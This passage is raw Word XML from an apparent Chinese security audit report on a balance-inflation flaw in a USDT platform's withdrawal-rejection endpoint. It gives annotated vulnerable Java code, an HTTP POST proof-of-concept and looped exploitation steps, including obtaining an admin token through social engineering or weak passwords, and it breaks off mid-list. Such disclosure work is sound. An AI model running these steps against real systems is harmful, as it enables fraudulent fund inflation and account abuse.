          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>WithdrawManageController.reject()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 传入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（Long 类型，无法注入）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>WithdrawManageService.reject()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Transactional</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 加行锁）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>applyRejectedImport()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：余额加减方向逆反）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userAccountRepository.save()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 持久化错误余额。</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Controller 入口：WithdrawManageController.java</w:t>
              <w:br/>
              <w:t>@PostMapping("/reject")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; reject(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestParam Long recordId,          // ← 攻击者（管理员）可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestParam String rejectReason,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestParam(required = false) String operatorRemark) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    withdrawManageService.reject(recordId, rejectReason, operatorRemark);  // ← 污点传入 service</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service：WithdrawManageService.java — reject()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void reject(Long recordId, String rejectReason, String operatorRemark) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    WithdrawApplyRecord record = withdrawApplyRecordRepository.findByIdForUpdate(recordId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("提现申请记录不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    applyRejectedImport(record, rejectReason, operatorRemark);  // ← 污点流向漏洞方法</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞点：WithdrawManageService.java — applyRejectedImport()</w:t>
              <w:br/>
              <w:t>private void applyRejectedImport(WithdrawApplyRecord record, String rejectReason, String operatorRemark) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal refundAmount = record.getAmount() != null ? record.getAmount() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal usable = account.getUsdtUsableBalance() != null ? account.getUsdtUsableBalance() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (usable.compareTo(refundAmount) &lt; 0) {           // ← 守卫：仅当 usable &gt;= refundAmount 才继续</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalStateException("可提现余额不足，拒绝返还失败");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    // ← 漏洞核心：拒绝应是"解冻"，即 usdtUsableBalance += refundAmount，usdtBalance 不变</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 实际代码方向逆反：usdtBalance 被无中生有地增加，usdtUsableBalance 被二次扣减</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    BigDe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cimal currentUsdt = account.getUsdtBalance() != null ? account.getUsdtBalance() : BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setUsdtBalance(currentUsdt.add(refundAmount));           // ← 漏洞点：usdtBalance += X（虚增，从未被扣）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setUsdtUsableBalance(usable.subtract(refundAmount));     // ← 漏洞点：usdtUsableBalance -= X（申请时已减，再减一次）</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);                             // ← 持久化错误余额</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b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前置条件构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（复现路径）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1149"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用户 A 账户初始：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance=1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance=1000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1150"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">用户 A 通过游戏端申请提现 200 USDT → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 变为 800（守卫值：800 ≥ 200，可通过）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1151"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">该申请的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recordId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 假设为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>12345</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，状态为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>STATUS_PENDING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第一轮拒绝请求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（触发虚增）：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POST /withdrawManage/reject HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target-host&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;管理员合法 Token&gt;</w:t>
              <w:br/>
              <w:t>Origin: &lt;管理后台合法 Origin&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>recordId=12345&amp;rejectReason=不符合提现条件&amp;operatorRemark=审核拒绝</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>预期执行结果</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执行前：usdtBalance=1000, usdtUsableBalance=800</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行后：usdtBalance=1200 (虚增 200), usdtUsableBalance=600 (二次扣减)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>循环利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（用户再次申请 200，仍有 usable=600 ≥ 200）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1152"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第2轮拒绝后：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance=1400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance=400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1153"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第3轮拒绝后：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance=1600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance=200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第4轮（usable=200 ≥ 200，仍通过）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance=1800</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1155"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>第5轮申请被守卫拦截（usable=0 &lt; 200）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最终结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 从 1000 虚增至 1800，增幅 80%，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 归零。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1156"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">获取一个具有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 操作权限的管理员 Token（正常授权账号或通过社工/弱密码获取）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1157"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">找到或引导目标用户提交一笔申请额 ≤ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance / 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的提现申请（确保用户申请后仍有足够 usable 通过守卫）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1158"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">循环执行：调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/withdrawManage/reject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 拒绝该申请 → 引导用户再次申请相同金额 → 重复，直至 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 耗尽</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1159"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">每轮循环使 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 增加一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refundAmount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUsableBalance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 减少一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refundAmount</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1160"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">如果系统存在其他依赖 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
